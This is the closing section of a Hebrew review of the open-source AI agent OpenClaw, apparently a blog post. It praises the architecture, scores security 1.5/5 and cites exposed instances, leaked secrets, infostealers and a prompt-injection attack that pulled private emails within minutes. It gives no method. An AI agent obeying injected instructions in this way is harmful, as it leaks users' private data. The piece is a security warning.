ארכיטקטורה: 4.5/5 | אבטחה: 1.5/5 | פיצ'רים: 4.5/5 | קהילה: 4/5
OpenClaw מגיע לו הכוכבים שלו על שאפתנות וביצוע. הארכיטקטורה באמת בנויה היטב: TypeScript קשיח, דפוסי עיצוב נקיים, ומערכת תוספים שפרויקטים אחרים של קוד פתוח צריכים ללמוד ממנה.
אבל תמונת האבטחה גרועה ממה שה-audit הראשוני שלי רמז. הנתונים מהשטח מדברים בעד עצמם: 42,665 מכונות חשופות, 181 סודות דלופים, נוזקות שכבר מכוונות לתיקיות הקונפיג, והתקפת הזרקת פרומפט שחילצה מיילים פרטיים בחמש דקות.
הצוות שולח מהר. השאלה היא אם הם יצליחו לאבטח את מה שהם כבר שלחו לפני שנוף האיומים מדביק את עקומת האימוץ. חודש בפנים, אני עוד לא משוכנע.
שורה תחתונה תכל'ס: OpenClaw הוא הפרויקט הקוד-פתוח הכי מרשים והכי מסוכן של 2026. תתקינו אותו על מכונת בדיקה. תקראו את קוד המקור. תתרמו תיקוני אבטחה. אבל אל תקרבו את חשבון ה-WhatsApp האמיתי שלכם, את מפתחות ה-API של הפרודקשן, או את הקרדנשיאלים של החברה שלכם לשום מקום קרוב אליו. עוד לא.
ועכשיו שאלה אליכם: כמה מה-56 מיומנויות שאתם התקנתם בשבוע האחרון באמת קראתם את קוד המקור שלהן לפני ההתקנה?
מקורות:
- GitGuardian: Moltbot Goes Viral, And So Do Your Secrets
- Cisco: Personal AI Agents Like OpenClaw Are a Security Nightmare
- VentureBeat: OpenClaw Agentic AI Security Risk CISO Guide
- DEV Community: From Clawdbot to Moltbot, the Full Story
- Malwarebytes: Clawdbot Rename Sparks Impersonation Campaign
- Palo Alto Networks: Why Moltbot May Signal AI Crisis
- Fortune: AI Agent Moltbot Data Privacy Nightmare
- Hudson Rock: Infostealer Malware Targeting OpenClaw
- Vectra AI: OpenClaw Attack Vector Analysis
- IBM: AI Agent Security Risks
- Maor Dayan: 42,665 Exposed OpenClaw Instances
- Fireship: The Wild Rise of OpenClaw (YouTube)
- Alex Finn: ClawdBot Setup and Use Cases (YouTube)
- OpenClaw GitHub Repository
- Wikipedia: OpenClaw
- Audit אבטחה עצמאי: ניתוח סטטי של בסיס הקוד המלא (520K LoC)
